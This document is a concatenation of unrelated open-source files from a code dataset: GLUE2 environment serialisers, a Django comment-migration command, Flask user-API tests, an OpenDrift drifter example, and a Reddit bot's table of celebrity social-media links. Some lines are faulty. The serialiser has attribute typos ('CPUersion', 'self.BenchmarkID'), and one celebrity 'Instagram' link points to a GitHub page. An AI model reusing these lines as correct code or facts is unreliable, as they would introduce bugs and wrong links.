doc["PhysicalAccelerators"] = self.data.PhysicalAccelerators
if self.data.UsedAcceleratorSlots is not None:
doc["UsedAcceleratorSlots"] = self.data.UsedAcceleratorSlots
if self.data.LogicalCPUs is not None:
doc["LogicalCPUs"] = self.data.LogicalCPUs
if self.data.CPUMultiplicity is not None:
doc["CPUMultiplicity"] = self.data.CPUMultiplicity
if self.data.CPUVendor is not None:
doc["CPUVendor"] = self.data.CPUVendor
if self.data.CPUModel is not None:
doc["CPUModel"] = self.data.CPUModel
if self.data.CPUVersion is not None:
doc["CPUVersion"] = self.data.CPUersion
if self.data.CPUClockSpeed is not None:
doc["CPUClockSpeed"] = self.data.CPUClockSpeed
if self.data.CPUTimeScalingFactor is not None:
doc["CPUTimeScalingFactor"] = self.data.CPUTimeScalingFactor
if self.data.WallTimeScalingFactor is not None:
doc["WallTimeScalingFactor"] = self.data.WallTimeScalingFactor
doc["MainMemorySize"] = self.data.MainMemorySize
if self.data.VirtualMemorySize is not None:
doc["VirtualMemorySize"] = self.data.VirtualMemorySize
doc["OSFamily"] = self.data.OSFamily
if self.data.OSName is not None:
doc["OSName"] = self.data.OSName
if self.data.OSVersion is not None:
doc["OSVersion"] = self.data.OSVersion
doc["ConnectivityIn"] = self.data.ConnectivityIn
doc["ConnectivityOut"] = self.data.ConnectivityOut
if self.data.NetworkInfo is not None:
doc["NetworkInfo"] = self.data.NetworkInfo
if len(self.data.ApplicationEnvironmentID) > 0:
doc["ApplicationEnvironmentID"] = self.data.ApplicationEnvironmentID
if len(self.data.BenchmarkID) > 0:
doc["BenchmarkID"] = self.BenchmarkID
return doc
#######################################################################################################################
# class AcceleratorEnvironmentOgfJson(ResourceOgfJson):
# data_cls = AcceleratorEnvironment
#
# def __init__(self, data):
# ResourceOgfJson.__init__(self,data)
#
# def get(self):
# return json.dumps(self.toJson(),sort_keys=True,indent=4)
#
# def toJson(self):
# doc = ResourceOgfJson.toJson(self)
#
# doc["Platform"] = self.data.Platform
# if self.data.PhysicalAccelerators is not None:
# doc["PhysicalAccelerators"] = self.data.PhysicalAccelerators
# if self.data.LogicalAccelerators is not None:
# doc["LogicalAccelerators"] = self.data.LogicalAccelerators
# if self.data.Vendor is not None:
# doc["Vendor"] = self.data.Vendor
# if self.data.Model is not None:
# doc["Model"] = self.data.Model
# if self.data.Version is not None:
# doc["Version"] = self.data.Version
# if self.data.ClockSpeed is not None:
# doc["ClockSpeed"] = self.data.ClockSpeed
# if self.data.Memory is not None:
# doc["Memory"] = self.data.Memory
# if self.data.ComputeCapability is not None:
# doc["ComputeCapability"] = self.data.ComputeCapability
#
# return doc
#######################################################################################################################
class AcceleratorEnvironments(Data):
def __init__(self, id, accel_envs=[]):
Data.__init__(self, id)
self.accel_envs = accel_envs
#######################################################################################################################
class AcceleratorEnvironmentsOgfJson(Representation):
data_cls = AcceleratorEnvironments
def __init__(self, data):
Representation.__init__(
self, Representation.MIME_APPLICATION_JSON, data)
def get(self):
return json.dumps(self.toJson(), sort_keys=True, indent=4)
def toJson(self):
eedoc = []
for accel_env in self.data.accel_envs:
eedoc.append(AcceleratorEnvironmentOgfJson(accel_env).toJson())
return eedoc
#######################################################################################################################
# class AcceleratorEnvironments(Data):
# def __init__(self, id, accel_envs=[]):
# Data.__init__(self,id)
# self.accel_envs = accel_envs
#######################################################################################################################
class AcceleratorEnvironmentsTeraGridXml(Representation):
data_cls = AcceleratorEnvironments
def __init__(self, data):
Representation.__init__(self, Representation.MIME_TEXT_XML, data)
def get(self):
return self.toDom().toprettyxml()
def toDom(self):
doc = getDOMImplementation().createDocument("http://info.teragrid.org/glue/2009/02/spec_2.0_r02",
"Entities", None)
for accel_env in self.data.accel_envs:
eedoc = AcceleratorEnvironmentTeraGridXml.toDom(accel_env)
doc.documentElement.appendChild(eedoc.documentElement.firstChild)
return doc
#######################################################################################################################
class AcceleratorEnvironmentsOgfJson(Representation):
data_cls = AcceleratorEnvironments
def __init__(self, data):
Representation.__init__(
self, Representation.MIME_APPLICATION_JSON, data)
def get(self):
return json.dumps(self.toJson(), sort_keys=True, indent=4)
def toJson(self):
eedoc = []
for accel_env in self.data.accel_envs:
eedoc.append(AcceleratorEnvironmentOgfJson(accel_env).toJson())
return eedoc
#######################################################################################################################
|
apache-2.0
| 4,658,216,852,875,104,000
| 44.581356
| 324
| 0.562451
| false
| 4.516795
| false
| false
| false
|
danirus/django-comments-xtd
|
django_comments_xtd/management/commands/populate_xtdcomments.py
|
1
|
1794
|
import sys
from django.db import connections
from django.db.utils import ConnectionDoesNotExist, IntegrityError
from django.core.management.base import BaseCommand
from django_comments.models import Comment
from django_comments_xtd.models import XtdComment
__all__ = ['Command']
class Command(BaseCommand):
help = "Load the xtdcomment table with valid data from django_comments."
def add_arguments(self, parser):
parser.add_argument('using', nargs='*', type=str)
def populate_db(self, cursor):
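# Each existing django_comments Comment becomes its own thread root:
# thread_id and parent_id point back at the comment itself, at level 0,
# order 1, with follow-up notifications disabled.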
for comment in Comment.objects.all():
sql = ("INSERT INTO %(table)s "
" ('comment_ptr_id', 'thread_id', 'parent_id',"
" 'level', 'order', 'followup') "
"VALUES (%(id)d, %(id)d, %(id)d, 0, 1, FALSE)")
cursor.execute(sql % {'table': XtdComment._meta.db_table,
'id': comment.id})
def handle(self, *args, **options):
total = 0
using = options['using'] or ['default']
for db_conn in using:
try:
self.populate_db(connections[db_conn].cursor())
total += XtdComment.objects.using(db_conn).count()
except ConnectionDoesNotExist:
print("DB connection '%s' does not exist." % db_conn)
continue
except IntegrityError:
if db_conn != 'default':
print("Table '%s' (in '%s' DB connection) must be empty."
% (XtdComment._meta.db_table, db_conn))
else:
print("Table '%s' must be empty."
% XtdComment._meta.db_table)
sys.exit(1)
print("Added %d XtdComment object(s)." % total)
|
bsd-2-clause
| 8,801,720,226,856,467,000
| 36.375
| 77
| 0.541806
| false
| 4.181818
| false
| false
| false
|
bradleygolden/userapi
|
tests/test_api.py
|
1
|
5577
|
from app import verify_password, validate_token, User
import json
from base64 import b64encode
def auth_headers(username, password):
username_password = "%s:%s" % (username, password)
headers = {
'Authorization': 'Basic %s' % b64encode(username_password.encode()).decode("ascii")
}
return headers
def test_verify_password_callback(test_client, app, user):
username = user.username
password = 'password'
token = user.generate_auth_token()
# test username, password, token as auth headers
with app.test_request_context():
assert verify_password(username, password) is True
assert verify_password(token) is True
assert verify_password('blah', 'blah') is False
assert verify_password('12345') is False
assert verify_password() is False
# test token as parameter
uri = "/api/v1/users?token={}".format(token.decode('utf-8'))
with app.test_request_context(uri):
assert verify_password() is True
def test_get_auth_token(test_client, user):
uri = '/api/v1/token'
headers = auth_headers(user.username, 'password')
resp = test_client.get(uri, headers=headers, follow_redirects=True)
data = json.loads(resp.data.decode('utf-8'))
assert 'token' in data
def test_validate_token(user, app):
token = user.generate_auth_token()
with app.test_request_context():
resp = validate_token(token)
data = json.loads(resp.data.decode('utf-8'))
assert 'is_valid' in data
assert data.get('is_valid') is True
class TestUserAPI:
def create_user(self, test_client, user, new_user,
auth_password='password', password='password'):
uri = '/api/v1/users/'
headers = auth_headers(user.username, auth_password)
resp = test_client.post(uri,
query_string=dict(username=new_user.username,
password=password,
email=new_user.email),
headers=headers,
follow_redirects=True)
return resp
def get_user(self, test_client, username, auth_username='foo',
auth_password='password'):
uri = '/api/v1/users/%s' % username
headers = auth_headers(auth_username, auth_password)
resp = test_client.get(uri, headers=headers, follow_redirects=True)
return resp
def test_getting_a_user(self, test_client, user):
resp = self.get_user(test_client, user.username)
assert resp.status_code == 200
data = json.loads(resp.data.decode('utf-8'))
assert data['email'] == user.email
assert data['username'] == user.username
assert data['id'] == user.id
def test_getting_users(self, test_client, users):
uri = '/api/v1/users/'
headers = auth_headers(users[0].username, 'password')
resp = test_client.get(uri, headers=headers, follow_redirects=True)
assert resp.status_code == 200
data = json.loads(resp.data.decode('utf-8'))
assert len(data) == len(users)
for i, user in enumerate(data):
assert data[i]['email'] == users[i].email
assert data[i]['username'] == users[i].username
assert data[i]['id'] == users[i].id
def test_creating_a_user(self, test_client, user):
new_user = User(username='new',
email='new@gmail.com')
new_password = 'password'
uri = '/api/v1/users/'
headers = auth_headers(user.username, new_password)
resp = test_client.post(uri,
query_string=dict(username=new_user.username,
password=new_password,
email=new_user.email),
headers=headers,
follow_redirects=True)
assert resp.status_code == 201
data = json.loads(resp.data.decode('utf-8'))
assert data['email'] == new_user.email
assert data['username'] == new_user.username
def test_updating_a_user(self, test_client, user):
username = 'new' # created from previous test
uri = '/api/v1/users/%s' % username
headers = auth_headers(user.username, 'password')
new_username = 'updated'
new_email = 'updated@gmail.com'
new_password = 'new_password'
resp = test_client.put(uri,
query_string=dict(new_username=new_username,
new_email=new_email,
new_password=new_password),
headers=headers, follow_redirects=True)
assert resp.status_code == 200
resp = self.get_user(test_client, new_username)
data = json.loads(resp.data.decode('utf-8'))
assert data['email'] == new_email
assert data['username'] == new_username
def test_deleting_a_user(self, test_client, user):
username = 'updated' # from previous test
uri = '/api/v1/users/%s' % username
headers = auth_headers(user.username, 'password')
# delete the user
resp = test_client.delete(uri, headers=headers)
assert resp.status_code == 200
# test that the user is actually deleted
resp = self.get_user(test_client, username)
assert resp.status_code == 404
|
mit
| 2,100,060,883,032,430,600
| 36.18
| 91
| 0.57002
| false
| 4.082723
| true
| false
| false
|
OpenDrift/opendrift
|
examples/example_current_from_drifter.py
|
1
|
3114
|
#!/usr/bin/env python
"""
Current from drifter
====================
"""
from datetime import datetime, timedelta
from opendrift.readers import reader_current_from_drifter
from opendrift.models.oceandrift import OceanDrift
o = OceanDrift(loglevel=20)
o.set_config('environment:fallback:land_binary_mask', 0)
#%%
# We make a reader which reconstructs the ocean current from
# observed time series of a drifter
# This is actual data of SLDMB/Code drifter as used in this study:
# Jones, C.E., Dagestad, K.-F., Breivik, O., Holt, B., Rohrs, J., Christensen, K.H., Espeseth, M.M., Brekke, C., Skrunes, S. (2016): Measurement and modeling of oil slick transport. Journal of Geophysical Research - Oceans, Volume 121, Issue 10, October 2016, Pages 7759-7775. DOI: 10.1002/2016JC012113.
drifterlons = [2.407376, 2.405140, 2.403248, 2.401872, 2.400152, 2.398518, 2.397056, 2.395766, 2.394476, 2.393358, 2.392584, 2.391810, 2.390606, 2.389316, 2.388628, 2.388370, 2.387940, 2.387510, 2.387338, 2.387166, 2.387252, 2.387338, 2.387682, 2.387854, 2.388284, 2.388628, 2.389230, 2.390004, 2.390434, 2.390692, 2.391380, 2.391896, 2.392068, 2.392154, 2.392068, 2.391896, 2.391896, 2.391896, 2.391638, 2.391380, 2.391208, 2.391036, 2.390692, 2.390090, 2.389660, 2.389058, 2.388628]
drifterlats = [60.034740, 60.033880, 60.033106, 60.032246, 60.031300, 60.030182, 60.028892, 60.027602, 60.026656, 60.025538, 60.024420, 60.023388, 60.022442, 60.021496, 60.020378, 60.019346, 60.018572, 60.017626, 60.016852, 60.016164, 60.015734, 60.015304, 60.014616, 60.014100, 60.013670, 60.013412, 60.013240, 60.013068, 60.013154, 60.013412, 60.013584, 60.013842, 60.014186, 60.014616, 60.015218, 60.015820, 60.016594, 60.017454, 60.018400, 60.019346, 60.020464, 60.021410, 60.022442, 60.023474, 60.024678, 60.025882, 60.026914]
drifterlats = drifterlats[::-1]
drifterlons = drifterlons[::-1]
driftertimes = [datetime(2015, 6, 10, 5, 50) +
timedelta(minutes=10)*i for i in range(len(drifterlons))]
r = reader_current_from_drifter.Reader(
lons=drifterlons, lats=drifterlats, times=driftertimes)
o.add_reader(r)
#%%
# We seed elements within polygon, as could have been extracted
# from remote sensing imagery
lons = [2.39, 2.391, 2.392, 2.393, 2.394, 2.393, 2.392, 2.391, 2.39]
lats = [60.02, 60.02, 60.019, 60.02, 60.021, 60.022, 60.021, 60.021, 60.02]
o.seed_within_polygon(lons=lons, lats=lats,
number=2000, time=r.start_time)
#%%
# Finally running simulation
o.run(end_time=r.end_time, time_step=r.time_step)
o.animation(buffer=.01, fast=True, drifter={'time': driftertimes, 'lon': drifterlons, 'lat': drifterlats,
'label': 'CODE Drifter', 'color': 'b', 'linewidth': 2, 'markersize': 40})
#%%
# .. image:: /gallery/animations/example_current_from_drifter_0.gif
#%%
# Drifter track is shown in red, and simulated trajectories are shown in gray. Oil spill is displaced relative to drifter, but drifter current is assumed to be spatially homogeneous.
o.plot(buffer=.01, fast=True, trajectory_dict={
'lon': drifterlons, 'lat': drifterlats,
'time': driftertimes, 'linestyle': 'r-'})
|
gpl-2.0
| -4,592,492,746,717,793,300
| 55.618182
| 531
| 0.703597
| false
| 2.402778
| false
| false
| false
|
DrewsephA/Celeb_Username_Bot
|
config.py
|
1
|
48634
|
''' ---------------------------------------------------------------------------------------------------------------- '''
''' These below are the membership groups and their membership customized replies. Edit this area to expand the bot. '''
''' ---------------------------------------------------------------------------------------------------------------- '''
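# Every entry below follows the same two-part pattern: a tuple of lower-case keywords
# and a matching Markdown reply string ending with the bot footer. The commented-out
# entry here is a purely hypothetical template ("JaneDoe" and its links are placeholders,
# not real accounts), kept as a sketch of how to extend the bot:
#JaneDoe = ("jane", "doe")
#JaneDoeReply = """
#[Instagram](https://instagram.com/example)\n
#[Twitter](https://twitter.com/example)\n
#\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
#"""
# Remember to also add {JaneDoe: JaneDoeReply} to the `celebs` tuple at the end of this file.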
SelenaGomez = ("selena", "gomez") #Will trigger if these two words BOTH are in the title.
SelenaGomezReply = """
[Instagram](https://instagram.com/SelenaGomez/)\n
[Twitter](https://twitter.com/SelenaGomez)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlexisRen = ("alexis", "ren") #Every ("firstname", "nickname", "lastname") in the ()'s below must be lower case.
AlexisRenReply = """
[Instagram](https://instagram.com/alexisren)\n
[Twitter](https://twitter.com/alexisreng)\n
[Tumblr](http://alexisreneg.tumblr.com)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TaylorSwift = ("taylor", "swift")
TaylorSwiftReply = """
[Instagram](https://instagram.com/taylorswift)\n
[Twitter](https://twitter.com/Taylorswift13)\n
[Facebook](https://www.facebook.com/TaylorSwift)\n
[Website](http://www.taylorswift.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
McKaylaMaroney = ("mckayla", "maroney")
McKaylaMaroneyReply = """
[Instagram](https://instagram.com/McKaylaMaroney)\n
[Twitter](https://twitter.com/mckaylamaroney)\n
[YouTube Channel](https://www.youtube.com/channel/UC0HJyx19LKRmuHxfiqp9E8w)\n
[Keek](https://www.keek.com/profile/McKaylaMaroney)\n
[Vine](https://vine.co/u/920773070459904000)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SarahHyland = ("sarah", "hyland")
SarahHylandReply = """
[Instagram](https://instagram.com/therealsarahhyland)\n
[Twitter](https://twitter.com/sarah_hyland)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ArielWinter = ("ariel", "winter")
ArielWinterReply = """
[Instagram](https://instagram.com/arielwinter)\n
[Twitter](https://twitter.com/arielwinter1)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KarlieKloss = ("karlie", "kloss")
KarlieKlossReply = """
[Instagram](https://instagram.com/karliekloss/)\n
[Twitter](https://twitter.com/karliekloss/)\n
[YouTube](https://www.youtube.com/c/karliekloss)\n
[Facebook](https://www.facebook.com/KarlieKloss)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KendallJenner = ("kendall", "jenner")
KendallJennerReply = """
[Instagram](https://instagram.com/kendalljenner)\n
[Twitter](https://twitter.com/kendalljenner)\n
[Kendall + Kylie^TM](https://instagram.com/kendallandkylie/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KylieJenner = ("kylie", "jenner")
KylieJennerReply = """
Snapchat: KylizzleMyNizzl
[Instagram](https://instagram.com/kyliejenner)\n
[Twitter](https://twitter.com/kyliejenner)\n
[Kendall + Kylie^TM](https://instagram.com/kendallandkylie/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ChloeBennet = ("chloe", "bennet")
ChloeBennetReply = """
[Instagram](https://instagram.com/chloebennet4/)\n
[Twitter](https://twitter.com/ChloeBennet4)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HayleyAtwell = ("hayley", "atwell")
HayleyAtwellReply = """
[Instagram](https://instagram.com/realhayleyatwell)\n
[Twitter](https://twitter.com/HayleyAtwell)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AnnaKendrick = ("anna", "kendrick")
AnnaKendrickReply = """
[Instagram](https://instagram.com/annakendrick47/)\n
[Twitter](https://twitter.com/annakendrick47)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DaniThorne = ("dani", "thorne")
DaniThorneReply = """
[Instagram](https://instagram.com/dani_thorne/)\n
[Twitter](https://twitter.com/Dani_Thorne)\n
[Tumblr](http://danithornesworld.com/)\n
[Youtube](https://www.youtube.com/user/danithornesworld)\n
[IMDb](http://www.imdb.com/name/nm2374574/)\n
[Facebook](https://www.facebook.com/official.danimthorne)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BellaThorne = ("bella", "thorne")
BellaThorneReply = """
[Instagram](https://instagram.com/bellathorne)\n
[Twitter](https://twitter.com/BELLATHORNE)\n
[IMDb](http://www.imdb.com/name/nm2254074/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
EmiliaClarke = ("emilia", "clarke")
EmiliaClarkeReply = """
[Instagram](https://instagram.com/emilia_clarke/)\n
[Twitter](https://twitter.com/Emilia_Clarke)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
JessicaBiel = ("jessica", "biel")
JessicaBielReply = """
[Instagram](https://instagram.com/jessicabiel)\n
[Twitter](https://twitter.com/JessicaBiel)\n
[WhoSay](http://www.whosay.com/jessicabiel)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AshleyBenson = ("ashley", "benson")
AshleyBensonReply = """
[Instagram](https://instagram.com/itsashbenzo)\n
[Twitter](https://twitter.com/AshBenzo)\n
[Website](http://ashleybenson.net/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MelissaBenoist = ("melissa", "benoist")
MelissaBenoistReply = """
[Instagram](https://instagram.com/melissabenoist/)\n
[Twitter](https://twitter.com/MelissaBenoist)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MilanaVayntrub = ("milana", "vayntrub")
MilanaVayntrubReply = """
[Instagram](https://instagram.com/mintmilana)\n
[Twitter](https://twitter.com/MintMilana)\n
[YouTube: Live Prude Girls](https://www.youtube.com/user/LivePrudeGirls)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HeidiKlum = ("heidi", "klum")
HeidiKlumReply = """
[Instagram](https://instagram.com/HeidiKlum)\n
[Twitter](https://twitter.com/heidiklum/)\n
[Website](http://www.heidiklum.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
StanaKatic = ("stana", "katic")
StanaKaticReply = """
[Instagram](https://instagram.com/drstanakatic)\n
[Twitter](https://twitter.com/stana_katic)\n
[Website](http://www.stanakatic.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BlakeLively = ("blake", "lively")
BlakeLivelyReply = """
[Instagram](https://instagram.com/blakelively/)\n
[Twitter](https://twitter.com/blakelively)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MelissaDebling = ("melissa", "debling")
MelissaDeblingReply = """
[Instagram](https://instagram.com/melissadebling/)\n
[Twitter](https://www.twitter.com/MelissaDebling)\n
[Website](http://melissad.co.uk/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SarahShahi = ("sarah", "shahi")
SarahShahiReply = """
[Instagram](https://instagram.com/theonlysarahshahi/)\n
[Twitter](https://twitter.com/onlysarahshahi)\n
[WhoSay](http://www.whosay.com/sarahshahi)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
IrinaShayk = ("irina", "shayk")
IrinaShaykReply = """
[Instagram](https://github.com/DrewsephA/Celeb_Username_Bot)\n
[Twitter](https://twitter.com/theirishayk/)\n
[Facebook](https://www.facebook.com/IrinaShayk)\n
[Website](http://irinashaykofficial.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MarinaNery = ("marina", "nery")
MarinaNeryReply = """
[Instagram](https://instagram.com/marinadnery/)\n
[Twitter](https://twitter.com/marinadnery)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SandraRadav = ("sandra", "radav")
SandraRadavReply = """
[Instagram](https://instagram.com/sandraradav)\n
[Twitter](https://twitter.com/SandraRadav)\n
[YouTube channel](https://www.youtube.com/user/TheLovezumba)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
VanessaHudgens = ("vanessa", "hudgens")
VanessaHudgensReply = """
[Instagram](https://instagram.com/vanessahudgens)\n
[Twitter](https://twitter.com/vanessahudgens)\n
[Tumblr](http://vanessahudgens.tumblr.com/)\n
[YouTube channel](https://www.youtube.com/vanessahudgens)\n
[Facebook](https://www.facebook.com/VanessaHudgens)\n
[Pinterest](https://www.pinterest.com/vanessahudgens/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KellyBrook = ("kelly", "brook")
KellyBrookReply = """
[Instagram](https://instagram.com/iamkb)\n
[Twitter](https://twitter.com/IAMKELLYBROOK)\n
[YouTube channel](https://www.youtube.com/user/kellybrookofficial)\n
[Facebook](https://www.facebook.com/kellybrookofficial)\n
[Website](http://kellybrook.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MandyMoore = ("mandy", "moore")
MandyMooreReply = """
[Instagram](https://instagram.com/mandymooremm/)\n
[Twitter](https://twitter.com/TheMandyMoore)\n
[Facebook](https://www.facebook.com/mandymooreofficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AnnaFaith = ("anna", "faith")
AnnaFaithReply = """
Snapchat: AnnaFaithBae \n
[Instagram](https://instagram.com/annafaithxoxo/)\n
[Twitter](https://twitter.com/TheAnnaFaith)\n
[YouTube channel](https://www.youtube.com/channel/UCTcBaZEehmQeydOl1LTM_5Q/)\n
^Frost ^Sisters ^[instagram](https://instagram.com/frostsisters/) ^& ^[twitter](https://twitter.com/frostsisters)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LexieGrace = ("lexie", "grace")
LexieGraceReply = """
[Instagram](https://instagram.com/Lexiegracelove/)\n
[Twitter](https://twitter.com/lexiegracelove)\n
^Frost ^Sisters ^[instagram](https://instagram.com/frostsisters/) ^& ^[twitter](https://twitter.com/frostsisters)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
FrostSisters = ("frost", "sisters")
FrostSistersReply = """
[Instagram](https://instagram.com/frostsisters/)\n
[Twitter](https://twitter.com/frostsisters)\n
\n-\n
**Anna Faith** \n
